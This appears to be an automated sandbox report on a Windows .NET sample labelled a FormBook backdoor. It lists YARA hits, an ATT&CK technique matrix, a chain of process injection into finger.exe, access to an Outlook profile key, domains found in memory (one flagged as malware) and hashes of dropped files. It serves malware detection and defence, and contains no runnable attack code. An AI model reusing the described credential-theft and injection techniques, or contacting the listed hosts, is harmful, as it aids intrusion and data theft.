                Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match File source: 6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 6.2.72STaC6BmljfbIQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                [Behavior graph, image not preserved. Behavior Graph ID: 1567386, Sample: 72STaC6BmljfbIQ.exe, Startdate: 03/12/2024, Architecture: WINDOWS, Score: 100. Process chain shown in the graph: 72STaC6BmljfbIQ.exe (started) -> 72STaC6BmljfbIQ.exe (started) -> PWhloTdOLAusO.exe (injected) -> finger.exe (started) -> PWhloTdOLAusO.exe (injected) and firefox.exe (started).]

                | Source | Detection | Scanner | Label | Link |
                | --- | --- | --- | --- | --- |
                | 72STaC6BmljfbIQ.exe | 58% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook | |
                | 72STaC6BmljfbIQ.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                https://duckduckgo.com/chrome_newtabfinger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dts.gnpge.comPWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                        high
                                        http://www.graviton.energy/images/favicons/browserconfig.xmlfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.graviton.energy/images/favicons/favicon-32x32.pngfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdn.consentmanager.netfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                          high
                                          http://www.mohawktooldie.online/__media__/design/underconstructionnotice.php?d=mohawktooldie.onlinefinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                            high
                                            http://www.mohawktooldie.online/Mohawk_Hairstyles.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFOfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFFfinger.exe, 00000008.00000002.3271932261.0000000003D28000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000002EA8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.Mohawktooldie.onlinefinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mohawktooldie.online/__media__/js/trademark.php?d=mohawktooldie.online&type=nsfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.graviton.energy/../images/bg-landing-page.jpgfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://i4.cdn-image.com/__media__/pics/29590/bg1.png)finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                high
                                                http://www.mohawktooldie.online/display.cfmfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.hosttech.chPWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  high
                                                  http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfinger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        high
                                                        http://www.mohawktooldie.online/Mohawk_Carpet.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFOCXOmfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mohawktooldie.online/Organic_Hair_Products.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://i4.cdn-image.com/__media__/pics/28903/search.png)finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            https://00808.vip/finger.exe, 00000008.00000002.3271932261.000000000404C000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000031CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://delivery.consentmanager.netfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                http://www.graviton.energy/images/favicons/manifest.jsonfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.graviton.energyPWhloTdOLAusO.exe, 0000000B.00000002.3270119796.000000000088F000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icofinger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.graviton.energy/images/logo-hosttech.svgfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.graviton.energy/css/app.cssfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.graviton.energy/images/favicons/favicon.icofinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.ecosia.org/newtab/finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.graviton.energy/images/favicons/safari-pinned-tab.svgfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://ac.ecosia.org/autocomplete?q=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://use.typekit.net/bag0psx.cssfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.wofffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://i4.cdn-image.com/__media__/js/min.js?v2.3finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.graviton.energy/images/favicons/favicon-16x16.pngfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.graviton.energy/images/favicons/apple-touch-icon.pngfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://localhost/arkanoid_server/requests.phpfinger.exe, 00000008.00000002.3271932261.000000000361C000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2225572633.00000000073BC000.00000004.80000000.00040000.00000000.sdmp, 72STaC6BmljfbIQ.exefalse
                                                                                              high
                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.wofffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1567386
                                                                                                    Start date and time:2024-12-03 14:13:49 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 9m 46s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Run name:Run with higher sleep bypass
                                                                                                    Number of analysed new started processes analysed:13
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:2
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:72STaC6BmljfbIQ.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@11/2@9/8
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 75%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 91%
                                                                                                    • Number of executed functions: 98
                                                                                                    • Number of non-executed functions: 286
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: 72STaC6BmljfbIQ.exe
                                                                                                    No simulations
                                                                                                    Process:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1216
                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                    Malicious:true
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                    Process:C:\Windows\SysWOW64\finger.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196608
                                                                                                    Entropy (8bit):1.1209886597424439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                    Malicious:false
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.803479482947206
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:72STaC6BmljfbIQ.exe
                                                                                                    File size:765'952 bytes
                                                                                                    MD5:a8058bb3809176bc3ee9e52df4960f87
                                                                                                    SHA1:e417d18ba2bc63b1f4cc4d915e611aa963c1aec4
                                                                                                    SHA256:04f2a2c8f4f414e1d33b5f2c3d8a0a3d915d5bb155914f16aec22e31e0ab2ebd
